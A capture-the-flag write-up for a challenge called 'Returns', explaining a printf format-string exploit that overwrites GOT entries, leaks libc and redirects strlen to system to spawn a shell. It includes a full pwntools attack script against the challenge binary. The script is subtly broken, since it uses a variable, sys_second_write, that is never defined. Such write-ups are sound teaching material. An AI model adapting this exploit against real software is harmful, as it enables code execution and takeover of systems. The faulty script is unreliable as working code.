Returns Writeup

1. Overwrite the GOT entry for `puts` to the address of `main`
Because `puts` is only called right before the end of `main`, we now get a loop where we can do more malicious printf's

2. Leak libc using `%lx`.
If you use the string `%2$lx`, you will get an address that is a fixed distance away from libc, and thus you can calculate where `system` and other libc methods are located. (Note that this offset may be different on various versions of libc, so make sure you use the libc.so.6 provided)

3. Overwrite the GOT entry for `strlen` to the calculated address for `system`.
Notice that `strlen` is called on our user controlled string every time through `main`. Therefore, after this overwrite, we can simply pass '/bin/sh' as our input string, and voila, a shell!

There are some technical details that I will briefly mention.
- Our string for `printf` cannot contain any null characters, but the address we want to write to for step 1 has a null. However, the code manually writes a null byte to the end of our string, so we can use this to get a null byte in our target address. Unfortunately, this means that we can only really do one overwrite per cycle through `main`, and if we do, say, a partial overwrite that results in an invalid address, we will segfault before getting to finish the partial overwrite.
- For step 3, the address of system in libc is very large, and we only get one actual overwrite as mentioned by the previous note. However, the more significant four bytes are the same for system as in our original targetted address, so we only need to write to the lesser significant bits.

Here is our really crappy exploit script. Yes, it is really crappy.

from pwn import *

def pad(s):
    l = len(s)
    if l > 16:
        raise ValueError("Need to increase padding amount")
    else:
        return s + " "*(16-l) + ":%lx:end"

p = process('/problems/2019/returns/returns')

# Step 1: Overwrite puts to main()
exploit1 = "%{}x%11$n".format(0x4011a6)
exploit1 = pad(exploit1)
# the `ff` is present because the code will manually overwrite this to a null byte
exploit1 += p64(0x00000000ff404018)
p.sendline(exploit1)

p.clean()

# Step 2: Leak LIBC
p.sendline("%2$lx")
# if the server is running slowly, this will time out and give an error in the `leaked = ...` line
d = p.recv()
leaked = int(d.split(" ")[5][:-1],16)
print "LEAKED", hex(leaked)

# calculated by inspecting memory in GDB
system_offset = 0x3813f0

system = leaked - system_offset
print "SYSTEM", hex(system)
sys_lesser_significant_bytes = system % (1<<32)

print "WANT TO WRITE"
print hex(sys_lesser_significant_bytes)

# This checks to see if our system address to write
# is relatively small, so there won't necessarily be a bajillion spaces printed out
# In fact, python will likely run out of memory on the shell if we try to write anything
# larger than this
if sys_second_write >= 0x1000000:
    print "Run again"
    exit(0)

# Step 3: Overwrite strlen to system
exploit2 = "%{}x%11$n".format(sys_second_write)
exploit2 = pad(exploit2)
exploit2 += p64(0x00000000ff404020)

p.sendline(exploit2)

# When the server is running slowly, this long timeout is actually necessary
# to clean out the huge number of spaces that are printed
p.clean(timeout=1)

# Send /bin/sh, which will be called by strlen -> system, which gives us a shell
p.sendline("/bin/sh")
p.sendline("cat /problems/2019/returns/flag.txt")

print p.recv()
p.interactive()